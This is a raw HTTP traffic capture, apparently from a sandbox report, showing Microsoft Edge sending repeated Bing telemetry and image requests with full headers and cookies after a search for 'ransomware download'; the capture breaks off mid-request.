x-msedge-ref: Ref A: A75432DD63624CBAB6786AD4C8BA46AD Ref B: LTSEDGE1112 Ref C: 2024-02-29T15:31:53Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:53 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220713.b316d8c
-
Remote address:92.123.128.152:443RequestGET /th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A58286964F96434F9091147C1BD23A6B Ref B: LTSEDGE1906 Ref C: 2024-02-29T15:31:55Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220715.b3176f5
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5BEA57B9B3AE40B5AE7A6A4F2539D757 Ref B: LON04EDGE0608 Ref C: 2024-02-29T15:31:57Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220717.b318222
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220709450%2C%22Name%22%3A%22RejectAll%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220710504%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220710716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220709450%2C%22Name%22%3A%22RejectAll%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220710504%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220710716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 059A2F3185D044CD9935F6CFF0D7168E Ref B: LTSEDGE1112 Ref C: 2024-02-29T15:31:58Z
date: Thu, 29 Feb 2024 15:31:58 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220718.b318944
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220711890%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220712711%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220711890%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220712711%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DD409FF4EFCF48948DFB2468265A39D3 Ref B: LTSEDGE1912 Ref C: 2024-02-29T15:32:03Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220723.b31a36f
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220714294%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220714294%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BAFA17A94667434FBAAA58A434985E54 Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:32:04Z
date: Thu, 29 Feb 2024 15:32:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220724.b31a8e8
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 25147
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 157C7D056B9643F5884C3318D9C2EE88 Ref B: LON04EDGE0608 Ref C: 2024-02-29T15:32:07Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:07 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220727.b31bd45
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220720758%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220720758%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1466B6292754DCE828049BB95600BAF Ref B: LON04EDGE1119 Ref C: 2024-02-29T15:32:08Z
date: Thu, 29 Feb 2024 15:32:08 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220728.b31c28d
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1167
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
